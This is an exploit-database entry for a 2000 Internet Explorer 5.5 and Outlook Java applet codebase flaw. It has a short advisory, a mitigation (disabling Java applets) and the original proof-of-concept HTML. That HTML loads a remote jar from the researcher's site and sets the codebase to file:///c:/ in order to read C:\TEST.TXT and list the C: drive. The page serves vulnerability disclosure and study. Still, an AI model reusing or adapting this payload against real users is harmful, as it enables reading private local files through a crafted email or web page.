header-logo
Suggest Exploit
vendor:
Internet Explorer, Outlook/Outlook Express
by:
Georgi Guninski
7.5
CVSS
HIGH
Java Applet Codebase Vulnerability
94
CWE
Product Name: Internet Explorer, Outlook/Outlook Express
Affected Version From: Microsoft Internet Explorer 5.5
Affected Version To: Microsoft Outlook/Outlook Express
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2000

Demo – IE 5.5/Outlook java security vulnerability – reading arbitrary local files and URLs

An attacker may gain read access on remote systems by specifying a custom codebase in a Java applet, and delivering to the victim(s) via HTML email or a website. Any arbitrary codebase can be referenced by a java applet that was loaded by an <OBJECT> tag in conjunction with a jar file when using Microsoft Internet Explorer or Outlook/Outlook Express. This allows for the possibility of any known file to be read by a remote attacker.

Mitigation:

Disable Java applets in the browser or use a browser that does not support Java applets.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1812/info

An attacker may gain read access on remote systems by specifying a custom codebase in a Java applet, and delivering to the victim(s) via HTML email or a website. Any arbitrary codebase can be referenced by a java applet that was loaded by an <OBJECT> tag in conjunction with a jar file when using Microsoft Internet Explorer or Outlook/Outlook Express. This allows for the possibility of any known file to be read by a remote attacker.

<HTML>
<HEAD>
<TITLE>
Demo - IE 5.5/Outlook java security vulnerability - reading arbitrary local files and URLs
</TITLE>
</HEAD>
<BODY>
Demo - IE 5.5/Outlook java security vulnerability - reading arbitrary local files and URLs
<BR>
This page reads C:\TEST.TXT and displays the directory listing of C:\
<BR>
<A HREF="javacodebase1-desc.html">Advisory</A>
<BR>

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>


<center>(C) Copyright 2000 Georgi Guninski</center>
<BR>
<center>
| <a href="http://www.guninski.com">Home</a> | 
<a href="browsers.html">Internet Explorer</a> | 
<a href="win2k.html">Windows 2000</a> | 
<a href="exploit.html">AIX</a> | 
<a href="netscape.html">Netscape</a> | 
<a href="greets.html">Greets</a> | 
<a href="index.html">More...</a> | 
</center>
</BODY>
</HTML>